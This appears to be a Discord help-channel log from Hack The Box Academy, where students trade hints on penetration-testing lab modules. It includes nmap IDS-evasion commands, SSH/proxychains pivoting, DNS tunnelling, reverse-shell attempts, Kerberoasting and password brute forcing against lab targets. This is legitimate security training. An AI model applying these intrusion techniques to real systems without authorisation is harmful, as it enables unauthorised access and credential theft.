#modules
I would assume like the other modules if you review it, it should steer you in the right direction.
Take a break, it helps
probably have to allow for a self signed cert
what that means?
i don't know about this
yeah idk, just guessing, i don't know that much about the mysql command specifically
Can anyone help me with the Secure Coding 101 Assessment "On '/Reverse' you will find an obfuscated JavaScript code, but it appears to be broken, and doesn't return the flag! Try to reverse it to understand how it should be working, and fix it to get the flag." ,please?
I deobfuscated the code already, however I'm still struggling to identify the key.
Thank you in advance!
Alright!
My brain is so fried with the Password Attacks module
Did it DOS itself?
Nah bro, I'm just confused on how the attack worked
Any hints to solve "Enumerate the custom script that is running on the system and submit its output as the answer."? This question in SNMP enumeration has had me stuck for a long time.
review the data you've gathered
I'm a newbie at https://academy.hackthebox.com/module/77/section/726 question 3. Have
Welcome, as you’re new, please, if you’re asking for help, mention the module and section you need help with. That way more people will help.
Hi EverydaySparkling. Thnx for guidance. I copied another and put up the link which shows the module and section. I guess it's better to say the module is Getting Started and the section is Service Scanning.
Thing is with clicking the link, if I am on my mobile, it will open it in discord browser and I will have to login again
and then I am just like, nope, too much effort 🙂
and I am sure other people have the same 😅
Good to know! Much to learn about Discord as well!!👍 😆
Just want to know where the flag.txt file gets downloaded to ??
the current directory you're having your shell in
anyone please help me, I'm stuck at 'DNS Tunneling with Dnscat2' (Pivoting, Tunneling, and Port Forwarding)
Not quite sure what that means. Have checked download folder in the Pwnbox. It's Empty
When you open a shell, it will be running from a certain directory
you can find the current directory by running the pwd command
OK. I will go explore further. Thnx
ping me if you need any more help 🙂
I got "./dnscat --secret" but not able to import it
what error you getting?
I connected with xfreeRDP on htb-student and am trying the next step but it's not working
If you're connected with rdp, are you running it from powershell and running the command exactly as explained in the section?
Hello can someone help me pls
Attacking Common Applications - Skills Assessment I
Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.
I found website_backup in ftp but I don't have access to get it, then I found a vulnerable Apache Tomcat and I found exploits, but they did not work
PS C:\Users\htb-student> Import-Module .\dnscat2.ps1
Import-Module : The specified module '.\dnscat2.ps1' was not loaded because no valid module file was found in any
module directory.
At line:1 char:1
- Import-Module .\dnscat2.ps1
-
+ CategoryInfo : ResourceUnavailable: (.\dnscat2.ps1:String) [Import-Module], FileNotFoundException + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand
Still lost on this. I have the following: smb: \flag> get flag.txt
getting file \flag\flag.txt of size 33 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \flag>
Then what do I do to access the folder called 'flag' and submit the contents of the flag.txt file.
use cat command
┌─[eu-academy-3]─[10.10.14.146]─[htb-ac-1306913@htb-blbcwp3sp7]─[~/dnscat2/server]
└──╼ [★]$ ls
controller dnscat2-powershell dnscat2.rb Dockerfile drivers Gemfile Gemfile.lock libs tunnel_drivers
but it is there
Thnx TLattice 👍 Can you illustrate with an example cat command please
Any hints to solve "Enumerate the custom script that is running on the system and submit its output as the answer."? This question in SNMP enumeration has had me stuck for a long time.
Used everything: nmap scripts, snmpwalk, braa, but still not getting it
cat <file>
sounds like you still need to upload the ps1 to the target
yes
i suggest doing the linux fundamentals module if you haven't already @dusk haven
should be like cat flag/flag.txt
but yes, follow linux fundamentals like TLattice said
not able to import .\dnscat2.ps1
you sure its there?
show me
as its a tier2 , feel free to dm me
will reply in 10 minutes, gotta do something first
Sounds like a good idea !!
This is what I get smb: \flag> cat flag.txt
cat: command not found
smb: \flag>
you need to exit this tool first
Ah Hah !!
Yay !! Whoop whoop whoop Thnk U and signing off !!
great job 🙂
same. currently doing it.
need some help with the ICMP tunneling with SOCKS section of the Pivoting, Tunneling, and Port Forwarding module, can't seem to get nmap to work with proxychains
anyone free to dm
ayy, wanna do the path together?
https://academy.hackthebox.com/module/191/section/2062
Are two empty lines actually required? Empty body, Content-Length is not given. Just one new line is enough I guess
Hello. I've a problem in SHELLS & PAYLOADS: The Live Engagement
I can not find any working browser on the machine that I've connected to with RDP. Is it normal??
why do you need a browser on the machine that you RDPed into?
you can use your own browser, then copy paste anything you need
but i can not connect to host 1 on my own browser
Type firefox in the terminal of the jump host
welcome back marcie 🙂
ahoy, it is marcielee
Yes it's needed to trick the proxy into believing it's another request (from what I remember)
@naive sage here use this
*use these
no it's this because these would imply that you have sent multiple messages but it's all contained in one codeblock
yeah it will take a bit, it's compiling and installing the runtime
Oh gotcha.
skill issue
Real
DMed u
Anyone for a nudge on the HTTP Attacks Skills Assessment?
I'm able to perform a TE.CL from TE.TE and from Gunicorn but still the second request gets picked by the waf.... don't know if I have to double encode the blacklisted characters or what
are you familiar with wcvs tool?
A bit... Used on the other HTTP module
yeah
misconfiguration one
I am getting an issue with the wordlist, can you help me?
./go/bin/Web-Cache-Vulnerability-Scanner -u http://94.237.54.170:56841/ -sp language=en -gr
WCVS v1.0.0 started at 2024-10-03_14-01-29
Exported report ./2024-10-03_14-01-29_WCVS_Report.json
wordlists/headers: open wordlists/headers: no such file or directory
Did you install it via go? Try the same steps as the module.
Go to the releases link in the GitHub Repo, download the zip file and decompress it.
It will have a wordlist folder in it
okay
is using crackmapexec module worth it? considering everyone is using nxc now
it's the same syntax, so yes
ty
I'm on "Introduction to Python 3", "The First Iterations", and I have a question going: What is the 3rd most used word on the exercise target website? But for some reason I cannot access that target IP, neither from my device nor the Pwnbox. Does someone have an idea what I might be doing wrong?
check your vpn
I am connected but i still cannot access it. I tried to both ping it and use the pre existing code but neither work.
Bill Gates report on HTB Academy for the Login Brute Forcing module?
you don't need to use vpn, it's a docker target, just connect to the ip and port given
I just asked Copilot it seems like a line of code just was wrong i managed to do it now. Thx tho
Module: Attacking Authentication Mechanisms
Section: Skills Assessment
Can I ping someone for a quick hint? I||'m pretty sure that I need to use the jwk exploit but the application doesn't seem to arbitrary certificate / public key. thanks||
Just finished the 'Using CrackMapExec' module. I didn't see people here who finished it, so if anyone is stuck in the skills assessments I'm available for help.
Does anyone know, in the Windows Priv Esc module, Situational Awareness section, how to find out what executable other than cmd.exe is blocked by AppLocker?
Ok I'm back at it and I need help :p
The new Bruteforce login module, Skill assessment part I.
We're given a username list and a password list.
I don't see anything in the (very short) assessment description/question that leads me to anything else but feeding these to hydra to bruteforce the basic auth login of the target.
Problem: that is HUGE and would take 12 to 24h depending on network speed apparently...
Question: wtf 😄 What am I missing, or should I actually go through the whole cutting one word list in pieces, and fork hydra so that it can be achieved in the 90min lifetime of the target? Any help appreciated 🙂
use the chunked rockyou-*.txt (rockyou-25, -50, -75, etc.) i think you'll be able to cut your cracking time down with that
Hey any help here
Does anyone know, in the Windows Priv Esc module, Situational Awareness section, how to find out what executable other than cmd.exe is blocked by AppLocker?
Even though they give a very clear wordlist ?
2023-200_most_used_passwords.txt
Btw it's kind of interesting that the wordlist named "200 most used password" has 2611 lines... Am I missing something there haha
12-24h 😄 But now I am wondering if there is not an issue with that wordlist being way over the 200 lines it should have according to its name :p
YES ok, I must have really messed up with the wordlist somehow
I will download it again, mine was WAY too big
Hey guys,
I am currently trying to answer the last question from this Section:
INFORMATION GATHERING - WEB EDITION
Utilising WHOIS
"What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?"
I couldn't see that information with whois, so I decided to take a look on their bug bounty program.
But the address that is given there (starts with vulnerability...) does not solve the question.
Could you give me a small hint?
I think I am missing something here.
holy hell taking a break makes a world of a difference
yesterday i was doing a lab and i found a file that i spent like 2 hours figuring out what to do with and then i decided to call it quits for the night, it turns out it was a red herring and i logged on this morning and figured it out in about 5 minutes
whois gives you the information, you just have to look harder
or use grep if you don't want to read all of that
thanks i will try it again
Hey, need some help with the module Network Enumeration with Nmap, the hard lab.
Even when I go to http://<ip>/status.php the alerts go to 50-60 out of 75 without me doing anything...
Every subtle nmap enumeration gets me banned by the IPS after some time.
I have used the whois command from the busybox nix package. It does not show all of the available information. Installing the whois nix package directly and using that shows the information that I needed.
-> It appears that there are differences in the packages.
thanks breadgirljane, it really was there.
I'm stuck in a Skills Assessment challenge in Intro to Windows Command Line. Any way I can get help here?
you can just state your concern @topaz plinth someone here would answer it
do something like whois example.com | grep "email"
its there, just grep for it
whats your full nmap cmd you're using?
I'm on the 5th question: "User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them."
and I've tried almost every command I can fathom and I'm just not able to see the contents of the files. I can see the tree but the files in the tree.
findstr
you need to use the get-childitem cmdlet to parse thru the dirs for the flag. or maybe the find or findstr
try use 'Get-AppLockerPolicy' based powershell command. I will leave it to you to complete, if you really got stuck i will give you the full command.
sudo nmap 10.129.17.124 -F --script banner -Pn -n --disable-arp-ping --packet-trace --source-port 53 -T 1
Currently I'm running this scan for like 20 min and nothing detected me
sometimes im pinging the machine or doing a curl to /status.php to see how many alerts detected me
uhhhh who do i message if my account has been completely messed up
failing this scan you're running try utilizing the -T X option to adjust your timing and try to avoid the IDS/IPS
Yeah, but currently it didn't detect me
also you're using -F for fast scan; I'm not sure if that merely limits the number of ports or scans more aggressively (ie: more suspicious to the IPS) or both. You'll know soon enough I reckon though
if you're attempting to evade IDS/IPS then the "lesson" in the exercise would be regarding the -T option
-F is for top 100 ports
so if you get lucky here with your scan, move on if you want but know that the -T option is where you wanna be for evasion
I'm using -T
But its so slowww
plenty of ingredients in the cake on that cmd
I think the problem was when the machine first initialized, because when i checked <ip>/status.php it was showing 50 alerts out of 75
and after the ban was expired the number of alerts was resetting back down to 0 and now it works
neither of these commands displayed anything.
can you show your cmd? how you're using them?
Yeah 😅
you need to check the man page for those cmds to see how they're used; you can't just type them in, they require args to return results
i believe that is touched on in the modules, to some extent. if memory serves me correctly
ok so try the ... | findstr HTB* (or whatever the flag convention is) you've identified the files with gci now find the str inside it
You are trying to pass a PowerShell cmdlet in CMD. It won't work that way
ah, didnt catch that
Either pass it as an argument to powershell
but the situation remains the same: you know the files, you need to findstr them. gci is good for finding the files, then findstr for the flag contents
findstr should have a recurse cmd, or create a loop
apologies if this seems tough, i reckon you might be new to this, but these are essential workflows
||Get-ChildItem -Recurse -Filter *flag.txt | Get-Content||
In PowerShell
The flags for this module don't have the default HTB format
@topaz plinth not sure if this is self evident, but once you're in cmd.exe you need to launch powershell with a powershell.exe cmd, or just open powershell from start menu, then run the above cmd from b5null
It was his cmdlets to be honest 😂
Anyone for a couple of pointers in the HTTP Attacks Skills Assessment?
This thing is driving me insane
it's a remote command prompt so it won't allow me to access a remote powershell
You will! Just type "powershell" and it will open up
Or powershell -Command "Your-PowerShell-Command"
This command got me nothing on the module Network Enumeration with NMAP under the hard lab
Host is up (0.078s latency).
Not shown: 98 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 3299.49 seconds
Any help would be appreciated.
Were you able to finish this topic? This entire module is based on errors; I take more time troubleshooting instead of doing the tasks.
I am stuck on dll errors (and yes, the real time protection is disabled and the folder listed as exception, just in case).
You are running a Fast scan. If I remember correctly this would only scan the 100 most popular ports.
You should strive to find a filtered high number port and then try to access it to find the flag.
The Evasion section will point out what you have to do
Hey guys, anyone for this answer? I already found it by looking for the default creds on the internet but want to know if there is a certain command? It's the password cracking module
@rustic sage please don’t post flags, even if they might be wrong 🙂
K sorry
Feel free to dm me 🙂
It doesn’t mention about which ports to scan
Should I scan all the ports?
i tried to use this command and this is what i got
just want to know if the point of this question was to find the default creds on internet or to use a certain command ^^
You can try the stuff in the evasion section and it should be listed in your results
Also change the flag to perform one of the half scans like an ACK or a FIN
Do you pay extra for the HTB labs (monthly or so) after paying for the Academy (Pentester path)?
Yes, they’re different platforms. But only if you want to play the retired content, want private instances or use pwnbox
More info here: https://www.hackthebox.com/hacker/pricing
Oh! I need more clarity, please. Doesn't the HTB academy subscription include machines to learn/practice with? I am not talking about the 20 free machines you get for a trial!
I am trying to use the Parrot terminal to practice what was illustrated in the modules, but I am not getting the same results as shown in the modules.
I am new to this and trying to figure things out. TY
No, academy doesn’t include the machines from the main platform
Both separate subscriptions 🙂
Were you able to solve it?
I was not 😦
Go DM
This is what they got from the module I am on:
nmap -sC -sV -p21 10.129.42.253
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-20 00:54 GMT
Nmap scan report for 10.129.42.253
Host is up (0.081s latency).
When I try to run the same command from the instance (my Workstation), it says the host is down
u connected to the VPN?
It shows on the top right corner that the VPN is running. No, I didn't connect to the VPN since I am running the instance straight from the workstation. I do not have the option to connect to VPN either.
so you working from your own VM or the pwn box?
pwn box
ok cool you dont have to connect to the vpn, and i just noticed, u can reach the host, it says host is up here
That was a copy of what was illustrated in the module that I was trying to replicate. I was running the same command on my pwn box but it was saying host is down
Hey I got a question, maybe someone can help me with it. I'm doing the client-side validation section in File Upload Attacks. I already got the flag by doing the Burp practice, but I'm trying to do it through the inspector portion and I've gotten to the command line portion. However, when I do the function file check, I get no response/output. Anyone know how to get it to produce output? I input the function and the file and get nothing
No one on the HTTP Attacks module?
Hey, anyone know the answer to Windows Priv Esc, Initial Enumeration, question 4: what user is logged into the target host?
I entered net user and tried every name of user that I got but none worked, any help
I am on the footprinting smb in the pentesters path and am down to the "find additional information about the specific share we found previously and submit the customized version of that specific share as the answer" question and I'm not understanding what it's asking for. Anyone help?
Anyone know what I'm doing wrong here? I'm just working along with the example but I'm not getting the same result
From the example, it's .\SilkETW.exe -t user -pn Microsoft-Windows-PowerShell -ot file -p ./etw_ps_logs.json -l verbose -y C:\Rules\yara -yo Matches
The share you found in previous question, you need to find some additional information on it. a hint: crackmapexec can get you what you seek.
@opal nexus Ty
use 'query user'
You should get only one result. can you give a screenshot?
I used net user not query
Try 'query user' then
I ran that but I still don't understand what I'm looking for. Is it a customized file name, a new flag?
Make sure you don't enter spaces or something with the answer
The correct Crackmapexec command will list you the shares and their descriptions.
No spaces that was all fine but that isnt the user name i guess
Weird, It was for me and I think for everyone. You do talk about the ' What user is logged in to the target host?' question, right?
Yess
I got sccm_svc, all small letters
I entered that as the answer, not working
Mm
Don’t share answers to questions
Well due to 0x56 instruction (I'm not sure if he is a moderator) or not I had to delete my screenshot, but maybe you should take it to technical support or something.
There was something wrong
I am not a moderator, but it is not allowed to post answers for modules here
Every time I entered the correct answer and hit submit it showed me wrong answer, then I simply put that user name there, didn't click submit, just hit mark complete and continue as I had all other answers correct. Now I come back and look and it looks like it registered that answer
This was a glitch i think from htb side
Hello, I'm stuck on question 2 in the Pivoting, Tunneling, and Port Forwarding room. I captured the flag, but when I do a port scan with nmap on the target system, all ports are filtered and I cannot detect the rdp directly.
Question: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
https://academy.hackthebox.com/module/54/section/511
is this command true for this module??
how did you connect to the ssh, and configured the proxychains.conf?
@opal nexus ssh -D 9050 ubuntu@10.129.202.64
Full screen it
And the proxychains.conf?
$ tail -4 /etc/proxychains.conf
meanwile
defaults set to "tor"
socks4 127.0.0.1 9050
You need to port scan with -sT
ok its all correct. I assume you use 'proxychains' before the scan. for good practice i recommend using sudo as well.
guys I'm doing Web Proxies and I'm using Burp Intruder to enum for .html in the admin directory but it takes forever, is this normal?
i think i will just use ffuf or gobuster to save time
Just use zap or ffuf if its something simple
@opal nexus typed sudo and it worked, thanks
Also, burp community throttles the speed to 1 request a sec, so yes that’s normal
i really hoped that they provided short wordlist just to use instead of use a long one
Server-side Attacks
Skills Assessment
please help, I don't get any POST request, I already crawled all the pages
to be fair i was using wrong wordlist i didn't know that it had to be Seclists wordlist to work even so ffuf saves so much time
Practical Digital Forensics Scenario
Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.ex
Am I right to use Chainsaw to solve this task, or did I take a wrong turn somewhere?
finished, but that skills assessment is trash
Kerberos Attacks - Kerberoasting from Linux - GetUserSPNs.py inlanefreight.local/pixis: why do they use the username pixis if you don't know any users?
or do you need to know at least one user?
ah nm, you need to input a password. I missed that
please dm me if you can help
Did you ever figure this out? Mine get stuck on listening on [any] 9443 ...
do a script
no matter how i try it just won't exit
this is how i start the socat
socat -t 0 TCP-LISTEN:5050,reuseaddr,fork EXEC:"python3 server.py",pty,ctty
even if I sent a SIGTERM from the child process it still doesn't quit
SQL injection, is there any sort of setup to do on kali to get things working?
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
Sounds like a CA issue?
hey guys do you think the google cyber security certificate is worth getting?
Is burp proxy on?
It is super macro-view of the industry, nearly nothing technical in it, but if you're new to cybersecurity (I was) it's a nice little 2-weeks course, won't give you headaches, teaches you about how things work in the industry
Nope
Where u getting that error?
@sick whale Flexible schedule
6 months, 7 hours a week
Learn at your own pace ---- it says 4-6 months to complete on here lol
Yeah 1 hour per day only though
2 weeks if you have some linux cmd basis already, and spend 4-5h per day
literally first connection haha
yeah you're right, thanks bro. I just don't want to waste my time and money on something that's useless, but you say it's helpful starting out so I'll give it a shot
Well considering it's a monthly membership and I actually think you get the first month for free...
It's actually free haha
week free yes after its i think 50 a month
either way if its helpful ill try it out
┌──(&(㉿$%^$)-[~/htb/sqlinj]
└─$ mysql -h 94.237.54.103 -u root -p -P 46002
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
how do i get access to type in general i dont have permissions lmao
try restarting it, worked fine for me
okay thanks
Nope same
Must be some config on my side then
Tried sudo-ing it, doesn't change a thing, so it's not due to ownership of the CA
Read and follow #welcome
yeah, not sure what the problem would be
does it work on pwnbox
Not tried yet, will do when I'm out of my meeting :p
Network services
Help I’m stuck on the network services section of the Linux fundamentals
mongodb doesn't work on my pwnbox
Naaahhhh, i ragequit. I tried it on kali, parrot nothing changed.
Hi, in Using CrackMapExec in the Vulnerability Scan Modules section and I've encountered a problem. The exercise states: 'Authenticate to 10.129.230.129 (ACADEMY-CME-VULNSCAN-WS01) with user "Administrator" and password "IpreferanewP@$$".' However, while I can't authenticate using CrackMapExec, I am able to do so with Evil-WinRM. What am I doing wrong?
--local-auth
Thxs, feel so dumb 🥲
More of a curiosity than anything, but why does searching the Dashboard for "setoolkit" and/or "blackeye.sh" not turn up anything? Seeing as though phishing is by far the most common means by which bad actors gain initial footholds, you'd think there'd be some modules dedicated to tools that make phishing easy to pentest against, but apparently not.
There are some boxes with phishing as attack vector though
Yeah, just not on the Academy ― we definitely need a module dedicated to it.
The only place where phishing is even briefly mentioned as far as the Academy goes is in one single section of the module I'm in right now, which is the XSS module. Tools like SET and BlackEye need more Academy attention.
Our phishing campaigns fall under the red team and their engagements. Phishing is not within scope for our pentesting assessments according to our ROEs; however every place is different.
dm the commands you're using, it worked for me no problem on pwnbox too
did u open the image directory
this might be a dumb question but what exactly makes a VM safer to run malicious code? like the VM is still running on my physical machine from a hypervisor. also i dont really get how network requests work. my VM isnt on the same subnet IP but doesnt its network traffic have to go through my machine to get to the internet?
Because running within a VM provides a degree of separation from your host
Your VM could be on the same subnet yes, or it could go through NAT, which also possible to access the host network
But generally it's a matter of isolation
If your VM gets fucked, you can always stop it and revert
If your host gets fucked, it's a whole other number of steps to get back to trusting your system.
Me inside of Windows Active Directory Environment for the SOC Path
gotta love it when your "logon procedure is prohibited"
what enforces that isolation and stops data/code being written outside of the memory of the VM and instead ending up in the memory of my machine? which idek if thats possible, im still on cracking into HTB
Escaping from a guest to the host is certainly possible, and vulnerabilities have been around in the past
In the end, it's best effort
VMs are isolated from the host by the underlying virtualization features of your CPU / OS
If you want to go deeper, I'm not the person to speak to 😅
in the Windows Priv Esc module, where you have to take advantage of vulnerable services, my POC shell.ps1 script isn't connecting to my nc listener. Has anyone beaten this or could give me pointers?
Hey is anyone else stuck on "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer."
I keep getting the answer 1197734
but it says it's wrong
On XSS § Phishing, how long did any of you have to wait for a response? Because I prepared a working payload, used test:test credentials with my own IP to make sure that it works, and it showed up in netcat and everything. Went to send.php to make sure it sends properly ― "URL Sent!" Kept netcat open, and... crickets.
didn't have to wait long at all
Anyone would know how to get rid of this error in Kali:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
Is there some specific modification of the configuration to do? mysql connects well on pwnbox.
(I'm in the SQL injection module but without access to the DB, it will prove... complicated 😄 )
try finding a parameter that ignores ssl or doesn't need it
hard to say without knowing which section you're on
or what tool you're using
im getting this error
SQL injection -> using mysql to connect to the DB. Literally the first dumb question to make sure your environment is well set up :p well it is not haha
your error says what's wrong right there in your pic, Invoke-PowerShellTcp isn't a valid cmdlet. Did you import the script that uses it?
@cloud urchin no sorry, how do i do that?
I'm not finding a module "SQL Injection"
Import <file>
@cloud urchin sorry, stupid question, do I run that from the powershell environment on the victim's box?
I have no idea what you're trying to do, what module/section, etc. I was just responding to your question about why you were getting that error
@cloud urchin im on the windows priv esc module, under the abusing vulnerable services section
What section?
Intro to MySQL
I mean the question is straightforward, the command too, and it works on pwnbox.
But somehow it throws this error in Kali, and I have not touched anything on mysql config or anything (nor do I have used it more than a couple of times on boxes)
Which tool are you using?
mysql
what's your command syntax
Yes, you're generally going to be running powershell scripts on the target you're trying to elevate privileges on
looks like you're missing a password
No, password is entered after to avoid having it in cleartext in bash_history
(just tried passing it together, same error btw)
so what command did you use
weird, that worked for me on kali
Update: Works in PwnBox, but doesn't work in the Arch/Garuda version of Netcat — weird.
i'm getting the same error trying it now too
It worked once and then didn't ?
Or it worked in the past and now doesn't?
i did the module a long time ago and it worked without that error in my notes
Soooo maybe that's not me 😄 ?
(This is my nightmare: That this happens during the exam oO )
i got it working by using --skip-ssl
Well Garuda is Arch-based but much easier to install (and more full-featured out of the box) than vanilla Arch.
hahaha ok, that was an easy fix.
But what's the logic: SSL is required, so "skip it" ? How is it required then?
I don't get it haha
Thanks @cloud urchin btw!
it's saying the command is requiring it, not the server
I guess newer mysql client versions default to an SSL connection
i think
The skip argument reverts to previous behaviour (non-ssl)
yeah sorry not sure then. i use kali and it worked. sounds like arch may have some other funky stuff going on i'm not familiar with it at all except i heard it was for masochists
@cloud urchin nvm i got it, thanks for the help
Garuda* but still valid points
maybe some firewall rule or something?
Come to think of it, since Garuda comes with the Fish shell by default — that could also be to blame.
Update: it was KFirewall after all. Had set it up for some unrelated reasons, and had to temporarily disable outright for this to work properly.
Wrong thread, nvm..
It should take a few secs
Yeah, hence the problem being my firewall that I had to temporarily disable for this to work properly, as stated above
Yeah I had to do that with my Linux host, couldn’t get reverse shells
Sticking to kali vm from now on
Curious if the custom HTB fork of Parrot actually has an ISO that one could download — would make this process much easier. Of course, just plain old Parrot VM could also suffice.
Reason for the inquiry about Parrot as a VM choice of course is that MATE > Xfce in terms of configurability. That being said, just spinning up a Parrot Docker container is also a possibility…
yup it's on their site
this is the direct link to download the iso https://bunny.deb.parrot.sh//parrot/iso/6.1/Parrot-security-6.1_amd64.iso
Yup, see it now: https://deb.parrot.sh/parrot/iso/6.1/Parrot-htb-6.1_amd64.iso
Sure thing; having a literal locally hosted PwnBox should fix every issue.
I have a question regarding Active Directory, more specifically Cross-Forest Kerberoasting. If we conducted the attack successfully and got the credentials (in this case for mssqlsvc in the "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows" section), HOW do we use these credentials to access the other domain?
Would help to know that the account you're talking about is a default username. People are lazy when it comes to changing things most of the time.
If the account with a default username is an admin of one domain, it's likely to be an admin of multiple domains.
To elaborate: mssqlsvc is the account created automatically when a new instance of MSSQL Server is installed. So you're going to run into it quite often in the real world as a way into more than one domain.
Assuming I got a non-default username, my real question is basically: how do I access the OTHER domain with that account, regardless of whether it's default or not, with the creds I obtained?
The section of the module that mentions Rubeus provides some important clues. I'll have to review my command history to see how exactly I did it, but it has something to do with overlapping ACLs.
They mentioned Enter-PSSession, but this is for the admin password reuse. However, I tried using it against the other domain with the mssqlsvc creds and always got an error, so I basically did an attack and got a password but without the ability to access or see what the other domain has
Alright, just remembered: recall from the Password Attacks module that there's a way to use a hash directly without cracking it…
I had to do a lot of reviewing of PA during my walkthrough of the skills assessment for that module, just a heads up. Having Password Attacks open in a separate browser tab is going to really help you.
I will try that along with Enter-PSSession because I feel that the answer is here, especially since I have the password in cleartext
UPDATE: it worked using evil-winrm. I had to pivot through the network and run my credentials through evil-winrm, but I had to get the other domain's IP, which I did by pinging the domain first from the Windows machine. Also, it's now working using crackmapexec
That's why Ligolo is your friend: https://youtu.be/qou7shRlX_s?si=J6l89mu3RBZXNfFX
Decided on an even better solution than a VM for this: a dual-boot.
Spare installed SSD to the rescue
Just for fun, I chose to literally reuse the same username from the Academy PwnBox on this local install
Is it just me or are the machines not spawning rn lmao
I was gonna do that, but I always end up getting a new kali machine
Is it stuck on spawning
I think you gotta use ctrl+shift+r or spawn another machine so it kills that one
Yup I finished it
The only problem is the refresh rate. I cannot for the life of me figure out how to get it higher than 30Hz on my 4K display. With Plasma 6, that's no problem, but with MATE, it's next to impossible without needing to jump through some serious hoops.
Even adding "i915.modeset=1" to my kernel parameters did nothing to improve this.
Hi all, quick question on DACL2, we're provided with SharpHound collectors on the Windows box but not Bloodhound. Do we need to transfer the sharphound zip archive onto the pwnbox then? If yes how?
yes, using file transfer methods, smb/HTTP etc
Thanks for confirming!
How did you guys learn the basics of cyber?
Just did TryHackMe and getting destroyed in CTFs
@safe star do TryHackMe and Hack The Box give me the info necessary to complete certs like CompTIA
or would I have to expand?
Yeah, more than enough, but you can just watch a course and memorize terms for those exams
Htb and THM help tho
@safe star stupid question, but what do you mean by course for the exams, like what kind of course?
Just a CompTIA course on Udemy or youtube
Fixing this required manually editing xorg.conf. To save others the trouble, should they ever decide they too want a PwnBox clone on their system:
```
Section "Monitor"
    Identifier "Monitor0"
    HorizSync 30.0 - 135.0
    VertRefresh 56.0 - 61.0
    Modeline "3840x2160R" 533.00 3840 3888 3920 4000 2160 2163 2168 2222 +hsync -vsync
    Option "Primary" "true"
EndSection
Section "Device"
    Identifier "RocketLake-S"
    Driver "intel"
    Option "UseEdidFreqs" "false"
    Option "ModeDebug" "true"
EndSection
```
Wish this could be easier, but alas, it is what it is.
For CPTS, should I even take notes, or should I go through each module and fully understand it and then go back to the Academy when I need help for CPTS?
Because the notes are already on the website, what's the point in making notes when it's there, you know?
I suggest taking notes, it becomes very annoying having to click the modules, wait for them to load, then look for certain things many times.
Plus notes help you understand topics in your own words
Hello, I need help with Attacking Common Applications - Joomla - Discovery & Enumeration: I spent hours brute-forcing the admin password but it can't find it (I used rockyou.txt). What can I do about that?
Do I really need to spend days to finish trying the whole wordlist?
Or am I on the wrong track?
Hello, I'm doing Windows Privilege Escalation Skills Assessment - Part II and I'm on question 2, trying to escalate privileges to SYSTEM. I got a shell using msfvenom but it is not NT AUTHORITY\SYSTEM, and I also tried adding a user to the admin group, which didn't work.
You might want to read the section again
You're doing the || MSI || thing, right?
Now I did and it worked, thx
If I'm enrolled as a student and a certain Tier II module is 80% done and then I upgrade to Platinum, will this module be locked AND zeroed?
because I'm not sure about second part
No
thanks
It should just stick with 80%
but I believe it will be locked, right?
he would need to unlock it with cubes, but continue from where he left off
Hello dude, I need help with the Attacking DNS module.
DM me pls
attacking DNS module?
I am not 100% sure about the locking up bit, I would suggest to ask support indeed
yay
ig it's better, yeah
You mean a section related to DNS probably; what's the module name?
attacking DNS, part of CPTS
i mean, attacking common services - attacking DNS section
yeah see thats what i meant, the module is attacking common services 😂
oops 😐
ok lemme see DMs
Hey, I'm stuck on Firewall and IDS/IPS Evasion - Hard Lab in the module Network Enumeration with Nmap
This is the question
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
I've found the ports ||22,80,50000||, and the 3rd port running ||ibm-db2||.
Is it like a CTF, should I connect to the service? Or what? This whole lab is confusing me a bit..
The command I'm running: ||sudo nmap -p50000 -sV -v -Pn -n -g 53 10.129.56.157||
You can DM if you want a nudge
Still!? Do exactly what the Evasion section does.
Now that you found the port, connect to it spoofing your own source port as an important service that would rarely be blocked by a firewall
thanks
I was a bit confused 😥
but after finishing I understood what was missing
Guys hello, I am currently at Attacking Common Applications - Skills Assessment I. I managed to list the contents of the Administrator Desktop (dir) but when I'm trying to get the flag I can't get it; I tried many ways (type, more, echo, less)
Hey guys any idea?
Why doesn't it work? What's the error?
can not connect
is it because it was a local db?
maybe I am on the wrong path for exploiting this
make sure you can connect manually before using hydra
spoilers, make sure to use the full path
okay, need to take a look again because I saw that port 3308 was not open
sorry for that, i do use the full path, C:\full\path\to\flag
So here there is nothing. They said to connect to the target and find the credentials; I'm on the target now, is there a certain command where I can find the mysql credentials?
try passing the commands into cmd like
cmd /c whoami
make sure to use full path of cmd as well
thank i will try
but you might want to create a revshell with it
Like here I see that there is the process on the machine, I just want to know if the point of the exercise was to search for default creds or if there was a certain command to see the creds
password cracking module default cred section
question is... "I already have the answer btw"
well maybe check for open ports and try default credentials
What's a good note taking app for studying in the Academy?
I have reached the end of echoing into files
it'll be a preference thing I have used onenote, notion and I am now on Cherrytree which I like as you can use it on all OS types
Most learners are using Obsidian (some Notion), it really depends on your need.
I like open source (free) I hear obsidian is fairly good
If asking what to use, go for Obsidian.
I wouldn't use notion, I found when trying to collate all my notes it was a real pain unless you have a subscription
Yeah I am just asking to see what people are using nowadays
I mostly saw CT / Notion and ofc Obsidian.
I have like 7-8 years of CTF, course and work related notes, thing I regret is having them all over the place even now so when I am looking for something specific it can be a pain, especially if its on pen and paper (don't judge I was new lol)
Heard many people complain about its subscription model
